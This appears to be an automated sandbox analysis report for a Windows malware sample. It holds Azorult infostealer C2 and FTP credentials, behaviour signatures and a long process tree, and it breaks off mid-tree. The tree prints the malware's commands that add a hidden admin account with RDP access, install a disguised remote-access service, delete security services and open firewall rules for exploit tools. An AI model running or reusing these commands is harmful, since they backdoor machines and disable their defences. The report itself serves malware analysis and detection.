Analysis

  • max time kernel
    147s
  • max time network
    170s
  • platform
    windows10_x64
  • resource
    win10v20201028
  • submitted
    18-11-2020 16:58

General

Malware Config

Extracted

Credentials

  • Protocol:
    ftp
  • Host:
    109.248.203.81
  • Port:
    21
  • Username:
    alex
  • Password:
    easypassword

Extracted

Family

azorult

C2

http://195.245.112.115/index.php

Signatures

  • Azorult

    An information stealer that was first discovered in 2016, targeting browsing history and passwords.

  • Modifies Windows Defender Real-time Protection settings ⋅ 3 TTPs
  • Modifies visibility of hidden/system files in Explorer ⋅ 2 TTPs
  • RMS

    Remote Manipulator System (RMS) is a remote access tool developed by Russian organization TektonIT.

  • UAC bypass ⋅ 3 TTPs
  • Windows security bypass ⋅ 2 TTPs
  • ACProtect 1.3x - 1.4x DLL software ⋅ 2 IoCs

    Detects file using ACProtect software.

  • Grants admin privileges ⋅ 1 TTPs

    Uses net.exe to modify the user's privileges.

  • ASPack v2.12-2.42 ⋅ 9 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Blocks application from running via registry modification

    Adds application to list of disallowed applications.

  • Drops file in Drivers directory ⋅ 4 IoCs
  • Executes dropped EXE ⋅ 18 IoCs
  • Modifies Windows Firewall ⋅ 1 TTPs
  • Sets DLL path for service in the registry ⋅ 2 TTPs
  • Sets file to hidden ⋅ 1 TTPs

    Modifies file attributes to stop it showing in Explorer etc.

  • Stops running service(s) ⋅ 3 TTPs
  • UPX packed file ⋅ 4 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Loads dropped DLL ⋅ 7 IoCs
  • Modifies file permissions ⋅ 1 TTPs 64 IoCs
  • Reads data files stored by FTP clients ⋅ 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads local data of messenger clients ⋅ 2 TTPs

    Infostealers often target stored data of messaging applications, which can include saved credentials and account information.

  • Reads user/profile data of local email clients ⋅ 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers ⋅ 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting ⋅ 2 TTPs
  • Adds Run key to start application ⋅ 2 TTPs 4 IoCs
  • Checks installed software on the system ⋅ 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled ⋅ 1 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 ⋅ 1 TTPs
  • Looks up external IP address via web service ⋅ 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Modifies WinLogon ⋅ 2 TTPs 7 IoCs
  • Drops file in Program Files directory ⋅ 31 IoCs
  • Drops file in Windows directory ⋅ 8 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utility to control services on the system.

  • Enumerates physical storage devices ⋅ 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry ⋅ 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe ⋅ 9 IoCs
  • Gathers network information ⋅ 2 TTPs 1 IoCs

    Uses a command-line utility to view network configuration.

  • Kills process with taskkill ⋅ 6 IoCs
  • Modifies registry class ⋅ 6 IoCs
  • NTFS ADS ⋅ 2 IoCs
  • Runs .reg file with regedit ⋅ 2 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses ⋅ 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam ⋅ 1 IoCs
  • Suspicious behavior: LoadsDriver ⋅ 2 IoCs
  • Suspicious behavior: SetClipboardViewer ⋅ 1 IoCs
  • Suspicious use of AdjustPrivilegeToken ⋅ 64 IoCs
  • Suspicious use of SetWindowsHookEx ⋅ 11 IoCs
  • Suspicious use of WriteProcessMemory ⋅ 64 IoCs
  • System policy modification ⋅ 1 TTPs 3 IoCs
  • Views/modifies file attributes ⋅ 1 TTPs 31 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe
    "C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe"
    Drops file in Drivers directory
    Adds Run key to start application
    Checks whether UAC is enabled
    Modifies WinLogon
    NTFS ADS
    Suspicious behavior: EnumeratesProcesses
    Suspicious use of AdjustPrivilegeToken
    Suspicious use of WriteProcessMemory
    System policy modification
    PID:644
    • C:\ProgramData\Microsoft\Intel\wini.exe
      C:\ProgramData\Microsoft\Intel\wini.exe -pnaxui
      Executes dropped EXE
      Modifies registry class
      Suspicious use of WriteProcessMemory
      PID:3032
      • C:\Windows\SysWOW64\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\install.vbs"
        Suspicious use of WriteProcessMemory
        PID:1524
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\Programdata\Windows\install.bat" "
          Suspicious use of WriteProcessMemory
          PID:1528
          • C:\Windows\SysWOW64\regedit.exe
            regedit /s "reg1.reg"
            Runs .reg file with regedit
            PID:1836
          • C:\Windows\SysWOW64\regedit.exe
            regedit /s "reg2.reg"
            Runs .reg file with regedit
            PID:3548
          • C:\Windows\SysWOW64\timeout.exe
            timeout 2
            Delays execution with timeout.exe
            PID:2208
          • C:\ProgramData\Windows\rutserv.exe
            rutserv.exe /silentinstall
            Executes dropped EXE
            Suspicious use of AdjustPrivilegeToken
            Suspicious use of SetWindowsHookEx
            PID:3860
          • C:\ProgramData\Windows\rutserv.exe
            rutserv.exe /firewall
            Executes dropped EXE
            Suspicious use of SetWindowsHookEx
            PID:356
          • C:\ProgramData\Windows\rutserv.exe
            rutserv.exe /start
            Executes dropped EXE
            Suspicious use of AdjustPrivilegeToken
            Suspicious use of SetWindowsHookEx
            PID:2616
          • C:\Windows\SysWOW64\attrib.exe
            ATTRIB +H +S C:\Programdata\Windows\*.*
            Views/modifies file attributes
            PID:4032
          • C:\Windows\SysWOW64\attrib.exe
            ATTRIB +H +S C:\Programdata\Windows
            Views/modifies file attributes
            PID:2164
          • C:\Windows\SysWOW64\sc.exe
            sc failure RManService reset= 0 actions= restart/1000/restart/1000/restart/1000
            PID:3916
          • C:\Windows\SysWOW64\sc.exe
            sc config RManService obj= LocalSystem type= interact type= own
            PID:2240
          • C:\Windows\SysWOW64\sc.exe
            sc config RManService DisplayName= "Microsoft Framework"
            PID:1544
      • C:\ProgramData\Windows\winit.exe
        "C:\ProgramData\Windows\winit.exe"
        Executes dropped EXE
        Checks processor information in registry
        Modifies registry class
        Suspicious use of SetWindowsHookEx
        Suspicious use of WriteProcessMemory
        PID:3304
        • C:\Program Files (x86)\Windows Mail\WinMail.exe
          "C:\Program Files (x86)\Windows Mail\WinMail" OCInstallUserConfigOE
          Suspicious use of SetWindowsHookEx
          Suspicious use of WriteProcessMemory
          PID:3928
          • C:\Program Files\Windows Mail\WinMail.exe
            "C:\Program Files\Windows Mail\WinMail" OCInstallUserConfigOE
            Suspicious use of SetWindowsHookEx
            PID:3312
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c C:\Programdata\Install\del.bat
          PID:756
          • C:\Windows\SysWOW64\timeout.exe
            timeout 5
            Delays execution with timeout.exe
            PID:2408
    • C:\ProgramData\install\sys.exe
      C:\ProgramData\install\sys.exe
      Executes dropped EXE
      Loads dropped DLL
      Checks processor information in registry
      Suspicious use of WriteProcessMemory
      PID:3028
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\system32\cmd.exe" /c C:\Windows\system32\timeout.exe 3 & del "sys.exe"
        Suspicious use of WriteProcessMemory
        PID:3124
        • C:\Windows\SysWOW64\timeout.exe
          C:\Windows\system32\timeout.exe 3
          Delays execution with timeout.exe
          PID:1028
    • C:\programdata\install\cheat.exe
      C:\programdata\install\cheat.exe -pnaxui
      Executes dropped EXE
      PID:2180
      • C:\ProgramData\Microsoft\Intel\taskhost.exe
        "C:\ProgramData\Microsoft\Intel\taskhost.exe"
        Drops file in Drivers directory
        Executes dropped EXE
        Drops file in Program Files directory
        Drops file in Windows directory
        Suspicious use of SetWindowsHookEx
        PID:1968
        • C:\Programdata\RealtekHD\taskhostw.exe
          C:\Programdata\RealtekHD\taskhostw.exe
          Executes dropped EXE
          Adds Run key to start application
          NTFS ADS
          Suspicious behavior: GetForegroundWindowSpam
          Suspicious use of SetWindowsHookEx
          PID:3356
          • C:\Programdata\WindowsTask\winlogon.exe
            C:\Programdata\WindowsTask\winlogon.exe
            Executes dropped EXE
            Suspicious use of SetWindowsHookEx
            PID:3160
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /C schtasks /query /fo list
              PID:2116
              • C:\Windows\SysWOW64\schtasks.exe
                schtasks /query /fo list
                PID:1872
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c ipconfig /flushdns
            PID:4304
            • C:\Windows\system32\ipconfig.exe
              ipconfig /flushdns
              Gathers network information
              PID:4392
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c gpupdate /force
            PID:4432
            • C:\Windows\system32\gpupdate.exe
              gpupdate /force
              PID:4532
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls C:\Windows\SysWOW64\drivers\conhost.exe /deny Администраторы:(F)
          PID:4048
          • C:\Windows\SysWOW64\icacls.exe
            icacls C:\Windows\SysWOW64\drivers\conhost.exe /deny Администраторы:(F)
            Modifies file permissions
            PID:396
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls C:\Windows\SysWOW64\drivers\conhost.exe /deny System:(F)
          PID:3404
          • C:\Windows\SysWOW64\icacls.exe
            icacls C:\Windows\SysWOW64\drivers\conhost.exe /deny System:(F)
            PID:1500
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls C:\Windows\SysWOW64\drivers\conhost.exe /deny система:(F)
          PID:3840
          • C:\Windows\SysWOW64\icacls.exe
            icacls C:\Windows\SysWOW64\drivers\conhost.exe /deny система:(F)
            PID:2060
        • C:\programdata\microsoft\intel\R8.exe
          C:\programdata\microsoft\intel\R8.exe
          Executes dropped EXE
          Modifies registry class
          Suspicious use of SetWindowsHookEx
          PID:820
          • C:\Windows\SysWOW64\WScript.exe
            "C:\Windows\System32\WScript.exe" "C:\rdp\run.vbs"
            PID:3224
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c ""C:\rdp\pause.bat" "
              Modifies registry class
              PID:2032
              • C:\Windows\SysWOW64\taskkill.exe
                taskkill /f /im Rar.exe
                Kills process with taskkill
                PID:2036
              • C:\Windows\SysWOW64\taskkill.exe
                taskkill /f /im Rar.exe
                Kills process with taskkill
                PID:3412
              • C:\Windows\SysWOW64\timeout.exe
                timeout 3
                Delays execution with timeout.exe
                PID:2148
              • C:\Windows\SysWOW64\chcp.com
                chcp 1251
                PID:1532
              • C:\rdp\Rar.exe
                "Rar.exe" e -p555 db.rar
                Executes dropped EXE
                PID:3848
              • C:\Windows\SysWOW64\taskkill.exe
                taskkill /f /im Rar.exe
                Kills process with taskkill
                PID:1932
              • C:\Windows\SysWOW64\timeout.exe
                timeout 2
                Delays execution with timeout.exe
                PID:4156
              • C:\Windows\SysWOW64\WScript.exe
                "C:\Windows\System32\WScript.exe" "C:\rdp\install.vbs"
                PID:4820
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /c ""C:\rdp\bat.bat" "
                  PID:4944
                  • C:\Windows\SysWOW64\reg.exe
                    reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0 /f
                    PID:5032
                  • C:\Windows\SysWOW64\reg.exe
                    reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fAllowToGetHelp" /t REG_DWORD /d 1 /f
                    PID:5080
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh.exe advfirewall firewall add rule name="allow RDP" dir=in protocol=TCP localport=3389 action=allow
                    PID:5108
                  • C:\Windows\SysWOW64\net.exe
                    net.exe user "john" "12345" /add
                    PID:4176
                    • C:\Windows\SysWOW64\net1.exe
                      C:\Windows\system32\net1 user "john" "12345" /add
                      PID:4128
                  • C:\Windows\SysWOW64\chcp.com
                    chcp 1251
                    PID:2572
                  • C:\Windows\SysWOW64\net.exe
                    net localgroup "Администраторы" "John" /add
                    PID:4728
                    • C:\Windows\SysWOW64\net1.exe
                      C:\Windows\system32\net1 localgroup "Администраторы" "John" /add
                      PID:4180
                  • C:\Windows\SysWOW64\net.exe
                    net localgroup "Administratorzy" "John" /add
                    PID:4980
                    • C:\Windows\SysWOW64\net1.exe
                      C:\Windows\system32\net1 localgroup "Administratorzy" "John" /add
                      PID:2288
                  • C:\Windows\SysWOW64\net.exe
                    net localgroup "Administrators" John /add
                    PID:5024
                    • C:\Windows\SysWOW64\net1.exe
                      C:\Windows\system32\net1 localgroup "Administrators" John /add
                      PID:4380
                  • C:\Windows\SysWOW64\net.exe
                    net localgroup "Administradores" John /add
                    PID:4684
                    • C:\Windows\SysWOW64\net1.exe
                      C:\Windows\system32\net1 localgroup "Administradores" John /add
                      PID:4636
                  • C:\Windows\SysWOW64\net.exe
                    net localgroup "Пользователи удаленного рабочего стола" John /add
                    PID:4988
                    • C:\Windows\SysWOW64\net1.exe
                      C:\Windows\system32\net1 localgroup "Пользователи удаленного рабочего стола" John /add
                      PID:4524
                  • C:\Windows\SysWOW64\net.exe
                    net localgroup "Пользователи удаленного управления" John /add
                    PID:4396
                    • C:\Windows\SysWOW64\net1.exe
                      C:\Windows\system32\net1 localgroup "Пользователи удаленного управления" John /add
                      PID:4280
                  • C:\Windows\SysWOW64\net.exe
                    net localgroup "Remote Desktop Users" John /add
                    PID:4116
                    • C:\Windows\SysWOW64\net1.exe
                      C:\Windows\system32\net1 localgroup "Remote Desktop Users" John /add
                      PID:4596
                  • C:\Windows\SysWOW64\net.exe
                    net localgroup "Usuarios de escritorio remoto" John /add
                    PID:748
                    • C:\Windows\SysWOW64\net1.exe
                      C:\Windows\system32\net1 localgroup "Usuarios de escritorio remoto" John /add
                      PID:864
                  • C:\Windows\SysWOW64\net.exe
                    net localgroup "Uzytkownicy pulpitu zdalnego" John /add
                    PID:4552
                    • C:\Windows\SysWOW64\net1.exe
                      C:\Windows\system32\net1 localgroup "Uzytkownicy pulpitu zdalnego" John /add
                      PID:4744
                  • C:\rdp\RDPWInst.exe
                    "RDPWInst.exe" -i -o
                    Executes dropped EXE
                    Modifies WinLogon
                    Drops file in Program Files directory
                    PID:4756
                    • C:\Windows\SYSTEM32\netsh.exe
                      netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
                      PID:5960
                  • C:\rdp\RDPWInst.exe
                    "RDPWInst.exe" -w
                    Executes dropped EXE
                    PID:4672
                  • C:\Windows\SysWOW64\reg.exe
                    reg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "john" /t REG_DWORD /d 0 /f
                    PID:4540
                  • C:\Windows\SysWOW64\net.exe
                    net accounts /maxpwage:unlimited
                    PID:4664
                    • C:\Windows\SysWOW64\net1.exe
                      C:\Windows\system32\net1 accounts /maxpwage:unlimited
                      PID:4616
                  • C:\Windows\SysWOW64\attrib.exe
                    attrib +s +h "C:\Program Files\RDP Wrapper\*.*"
                    Drops file in Program Files directory
                    Views/modifies file attributes
                    PID:1444
                  • C:\Windows\SysWOW64\attrib.exe
                    attrib +s +h "C:\Program Files\RDP Wrapper"
                    Drops file in Program Files directory
                    Views/modifies file attributes
                    PID:4600
                  • C:\Windows\SysWOW64\attrib.exe
                    attrib +s +h "C:\rdp"
                    Views/modifies file attributes
                    PID:5236
              • C:\Windows\SysWOW64\timeout.exe
                timeout 2
                Delays execution with timeout.exe
                PID:4840
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sc start appidsvc
          PID:752
          • C:\Windows\SysWOW64\sc.exe
            sc start appidsvc
            PID:2220
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sc start appmgmt
          PID:1004
          • C:\Windows\SysWOW64\sc.exe
            sc start appmgmt
            PID:3308
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sc config appidsvc start= auto
          PID:3812
          • C:\Windows\SysWOW64\sc.exe
            sc config appidsvc start= auto
            PID:1372
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sc config appmgmt start= auto
          PID:3312
          • C:\Windows\SysWOW64\sc.exe
            sc config appmgmt start= auto
            PID:3468
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sc delete swprv
          PID:2236
          • C:\Windows\SysWOW64\sc.exe
            sc delete swprv
            PID:3868
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sc stop mbamservice
          PID:2348
          • C:\Windows\SysWOW64\sc.exe
            sc stop mbamservice
            PID:4108
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sc stop bytefenceservice
          PID:4168
          • C:\Windows\SysWOW64\sc.exe
            sc stop bytefenceservice
            PID:4220
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sc delete bytefenceservice
          PID:4240
          • C:\Windows\SysWOW64\sc.exe
            sc delete bytefenceservice
            PID:4284
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sc delete mbamservice
          PID:4348
          • C:\Windows\SysWOW64\sc.exe
            sc delete mbamservice
            PID:4404
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sc delete crmsvc
          PID:4440
          • C:\Windows\SysWOW64\sc.exe
            sc delete crmsvc
            PID:4520
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sc delete "windows node"
          PID:4580
          • C:\Windows\SysWOW64\sc.exe
            sc delete "windows node"
            PID:4624
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sc stop Adobeflashplayer
          PID:4648
          • C:\Windows\SysWOW64\sc.exe
            sc stop Adobeflashplayer
            PID:4692
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sc delete AdobeFlashPlayer
          PID:4716
          • C:\Windows\SysWOW64\sc.exe
            sc delete AdobeFlashPlayer
            PID:4872
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sc stop MoonTitle
          PID:4732
          • C:\Windows\SysWOW64\sc.exe
            sc stop MoonTitle
            PID:4900
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sc delete MoonTitle"
          PID:4976
          • C:\Windows\SysWOW64\sc.exe
            sc delete MoonTitle"
            PID:5056
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sc stop clr_optimization_v4.0.30318_64
          PID:2260
          • C:\Windows\SysWOW64\sc.exe
            sc stop clr_optimization_v4.0.30318_64
            PID:1036
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sc delete clr_optimization_v4.0.30318_64"
          PID:2720
          • C:\Windows\SysWOW64\sc.exe
            sc delete clr_optimization_v4.0.30318_64"
            PID:4200
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sc stop MicrosoftMysql
          PID:4188
          • C:\Windows\SysWOW64\sc.exe
            sc stop MicrosoftMysql
            PID:4264
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sc delete MicrosoftMysql
          PID:2204
          • C:\Windows\SysWOW64\sc.exe
            sc delete MicrosoftMysql
            PID:4528
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall set allprofiles state on
          PID:4400
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall set allprofiles state on
            PID:4556
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN
          PID:4376
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN
            PID:4480
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN
          PID:888
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN
            PID:4592
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN
          PID:4700
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN
            PID:4660
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN
          PID:4828
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN
            PID:4736
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Recovery Service" dir=in action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes
          PID:4920
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="Recovery Service" dir=in action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes
            PID:5088
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shadow Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes
          PID:5104
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="Shadow Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes
            PID:4224
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Security Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes
          PID:1140
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="Security Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes
            PID:4260
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Recovery Services" dir=out action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes
          PID:4288
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="Recovery Services" dir=out action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes
            PID:4492
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shadow Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes
          PID:4340
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="Shadow Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes
            PID:4804
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Security Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes
          PID:4748
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="Security Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes
            PID:4940
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Survile Service" dir=in action=allow program="C:\ProgramData\RealtekHD\taskhostw.exe" enable=yes
          PID:4668
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="Survile Service" dir=in action=allow program="C:\ProgramData\RealtekHD\taskhostw.exe" enable=yes
            PID:4772
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="System Service" dir=in action=allow program="C:\ProgramData\windows\rutserv.exe" enable=yes
          PID:4204
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="System Service" dir=in action=allow program="C:\ProgramData\windows\rutserv.exe" enable=yes
            PID:4824
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shell Service" dir=in action=allow program="C:\ProgramData\rundll\system.exe" enable=yes
          PID:4244
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="Shell Service" dir=in action=allow program="C:\ProgramData\rundll\system.exe" enable=yes
            PID:4364
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Script Service" dir=in action=allow program="C:\ProgramData\rundll\rundll.exe" enable=yes
          PID:4212
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="Script Service" dir=in action=allow program="C:\ProgramData\rundll\rundll.exe" enable=yes
            PID:4832
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Micro Service" dir=in action=allow program="C:\ProgramData\rundll\Doublepulsar-1.3.1.exe" enable=yes
          PID:4360
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="Micro Service" dir=in action=allow program="C:\ProgramData\rundll\Doublepulsar-1.3.1.exe" enable=yes
            PID:4800
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Small Service" dir=in action=allow program="C:\ProgramData\rundll\Eternalblue-2.2.0.exe" enable=yes
          PID:4352
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="Small Service" dir=in action=allow program="C:\ProgramData\rundll\Eternalblue-2.2.0.exe" enable=yes
            PID:4908
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort1" protocol=TCP localport=9494 action=allow dir=IN
          PID:4704
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="AllowPort1" protocol=TCP localport=9494 action=allow dir=IN
            PID:4776
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort2" protocol=TCP localport=9393 action=allow dir=IN
          PID:5068
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="AllowPort2" protocol=TCP localport=9393 action=allow dir=IN
            PID:4416
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort3" protocol=TCP localport=9494 action=allow dir=out
          PID:2248
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="AllowPort3" protocol=TCP localport=9494 action=allow dir=out
            PID:4104
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort4" protocol=TCP localport=9393 action=allow dir=out
          PID:4196
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="AllowPort4" protocol=TCP localport=9393 action=allow dir=out
            PID:4688
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP1" protocol=TCP action=block dir=IN remoteip=61.216.5.1-61.216.5.255
          PID:4332
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP1" protocol=TCP action=block dir=IN remoteip=61.216.5.1-61.216.5.255
            PID:4852
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP2" protocol=TCP action=block dir=out remoteip=61.216.5.1-61.216.5.255
          PID:3676
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP2" protocol=TCP action=block dir=out remoteip=61.216.5.1-61.216.5.255
            PID:868
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP3" protocol=TCP action=block dir=IN remoteip=118.184.176.1-118.184.176.255
          PID:4208
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP3" protocol=TCP action=block dir=IN remoteip=118.184.176.1-118.184.176.255
            PID:4584
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP4" protocol=TCP action=block dir=out remoteip=118.184.176.1-118.184.176.255
          PID:5084
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP4" protocol=TCP action=block dir=out remoteip=118.184.176.1-118.184.176.255
            PID:4304
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP5" protocol=TCP action=block dir=IN remoteip=163.171.140.1-163.171.140.255
          PID:4344
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP5" protocol=TCP action=block dir=IN remoteip=163.171.140.1-163.171.140.255
            PID:4928
        • C:\Windows\SysWOW64\cmd.exe
